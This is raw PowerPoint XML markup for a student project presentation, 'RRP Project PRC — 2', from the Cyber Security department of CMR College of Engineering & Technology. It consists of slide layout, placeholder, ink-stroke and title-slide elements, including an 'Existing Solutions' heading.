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ppt/ink/ink1.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/tags/tag2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag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4.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17.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18.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6" r:id="rId2"/>
    <p:sldId id="438" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="399" r:id="rId5"/>
    <p:sldId id="400" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="429" r:id="rId9"/>
    <p:sldId id="430" r:id="rId10"/>
    <p:sldId id="431" r:id="rId11"/>
    <p:sldId id="441" r:id="rId12"/>
    <p:sldId id="443" r:id="rId13"/>
    <p:sldId id="442" r:id="rId14"/>
    <p:sldId id="375" r:id="rId15"/>
    <p:sldId id="376" r:id="rId16"/>
    <p:sldId id="396" r:id="rId17"/>
    <p:sldId id="392" r:id="rId18"/>
    <p:sldId id="455" r:id="rId19"/>
    <p:sldId id="456" r:id="rId20"/>
    <p:sldId id="461" r:id="rId21"/>
    <p:sldId id="433" r:id="rId22"/>
    <p:sldId id="446" r:id="rId23"/>
    <p:sldId id="437" r:id="rId24"/>
    <p:sldId id="383" r:id="rId25"/>
    <p:sldId id="457" r:id="rId26"/>
    <p:sldId id="458" r:id="rId27"/>
    <p:sldId id="463" r:id="rId28"/>
    <p:sldId id="464" r:id="rId29"/>
    <p:sldId id="467" r:id="rId30"/>
    <p:sldId id="459" r:id="rId31"/>
    <p:sldId id="468" r:id="rId32"/>
    <p:sldId id="453" r:id="rId33"/>
    <p:sldId id="454" r:id="rId34"/>
    <p:sldId id="290" r:id="rId35"/>
    <p:sldId id="43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7"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83BE"/>
    <a:srgbClr val="8CA5CD"/>
    <a:srgbClr val="003D5B"/>
    <a:srgbClr val="F781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3820"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="1061" y="86"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2107"/>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6T07:06:09"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#F88122"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">378 141 24575,'35'0'0,"3"0"0,-12 0 0,13 0 0,-5 0 0,11 0 0,-11 5 0,26-4 0,0 10 0,22-10 0,8 5-549,3-6 549,-8 0 0,13 0 0,-22 0 0,6 0-121,-10 0 121,-16 0 0,-9 0 0,-8 0 0,-17 0 0,2 0 546,-14 0-546,3 0 124,-4 0-124,0 0 0,0 0 0,0 0 0,4 0 0,-4 0 0,4 0 0,-4 0 0,0 0 0,-31-5 0,5 4 0,-34-4 0,17 5 0,-26 0 0,16 0 0,-17 0 0,14 0 0,-7 0 0,-2 0 0,-8 0 0,-16 7 0,4 0 0,-15 7 0,0 7 0,-2-6-583,8 6 583,-4-8 0,16 1 0,6-2 0,5-4 0,27-3 0,3-5 0,13 0 0,4 4 583,1-3-583,9 6 0,-2-6 0,-2 7 0,-17-2 0,-2 4 0,-17 7 0,11-5 0,-5 4 0,12-6 0,2 0 0,5-4 0,5 2 0,2-7 0,12 3 0,18-4 0,-4 0 0,17 0 0,-15 0 0,4 0 0,48-6 0,2 5 0,-15-5 0,4 0-906,-2 5 0,0 0 906,2-5 0,-1-1 0,40-1 0,-43 1 0,0 0 0,30-1-217,1-4 217,-4 5 0,-25 0 0,-14 1 0,-5 6 0,-21 0 1791,3 0-1791,-10 0 238,0 0-238,0 0 0,0-4 0,0 3 0,4-3 0,28 4 0,-15 0 0,20 0 0,-27 0 0,1 0 0,0 0 0,5 0 0,1 0 0,1 0 0,4 0 0,-5 0 0,1 0 0,-7 0 0,-1 0 0,-9 0 0,3 0 0,-4 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,4 0 0,-2 0 0,7 0 0,-8 0 0,8 0 0,-8 0 0,14 0 0,-7 0 0,8 0 0,0 0 0,-4 0 0,4 0 0,-5 0 0,-6 0 0,0 0 0,-5 0 0,0 0 0,-29-4 0,9-2 0,-25-3 0,17-1 0,-1 0 0,0 0 0,-5-1 0,-2-4 0,-12-2 0,-1-6 0,0 0 0,-13-6 0,11 4 0,-13-5 0,15 13 0,1-5 0,12 11 0,2-4 0,10 9 0,5-2 0,2 7 0,3-3 0,-3 4 0,-1 0 0,1 0 0,-1 0 0,-5 0 0,-1 0 0,-5 0 0,1 0 0,-1 0 0,-5 0 0,-2 0 0,-5 0 0,-7 0 0,-9 0 0,-8 0 0,-7 0 0,-1 5 0,1 2 0,-1 6 0,1-1 0,7-5 0,8 4 0,9-5 0,12 4 0,2 0 0,5-4 0,6 2 0,0-7 0,5 7 0,1-8 0,-11 9 0,-2-3 0,-26 9 0,17-3 0,-10 3 0,20-5 0,5-1 0,2 0 0,4-4 0,0-1 0,4 0 0,-2-3 0,2 2 0,-3 1 0,-6 2 0,-1 3 0,-4 1 0,4-5 0,-4 4 0,9-8 0,-8 8 0,7-8 0,-2 3 0,8-4 0,1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t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-e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t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-e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t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-e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t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-e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t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea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8CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr kumimoji="0" lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US">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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr kumimoji="0" lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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8CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024</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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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8CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024</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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr kumimoji="0" lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024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BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>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CFA630-13BB-46C4-BD44-B2C5F9B66074}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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r" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:fld id="{BC5217A8-0E06-4059-AC45-433E2E67A85D}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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customXml" Target="../ink/ink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4.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.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5.jpeg"/><Relationship Id="rId4"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267200"/>
            <a:ext cx="9296400" cy="862330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:ln w="1905"/>
                <a:solidFill>
                  <a:srgbClr val="F78122"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="69850" dist="43180" dir="5400000">
                    <a:srgbClr val="000000">
                      <a:alpha val="65000"/>
                    </a:srgbClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="ADLaM Display" panose="02010000000000000000" pitchFamily="2" charset="77"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RRP Project PRC — 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="381000"/>
          <a:ext cx="7162800" cy="3605932"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7162800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="533400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="003D5B"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>CMR COLLEGE OF ENGINEERING &amp; TECHNOLOGY</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9199" marR="9199" marT="6133" marB="6133" anchor="b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="533400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="003D5B"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Kandlakoya</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" i="0">
                          <a:solidFill>
                            <a:srgbClr val="003D5B"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>, Medchal, Hyderabad - 501401</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9199" marR="9199" marT="6133" marB="6133" anchor="b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="533400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" i="0">
                          <a:solidFill>
                            <a:srgbClr val="003D5B"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Department of Computer Science and Engineering-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" i="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="003D5B"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t> Cyber Security</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" i="0">
                        <a:solidFill>
                          <a:srgbClr val="003D5B"/>
                        </a:solidFill>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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048000" y="1029335"/>
            <a:ext cx="2549525" cy="194945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381240" y="3657600"/>
            <a:ext cx="8381520" cy="75480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2972005"/>
            <a:ext cx="5105400" cy="760320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Existing Solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="4400" b="1">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752599"/>
            <a:ext cx="9144000" cy="5105401"/>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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="467403"/>
            <a:ext cx="3810000" cy="577440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Existing Solutions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381773" y="2044031"/>
            <a:ext cx="8380454" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
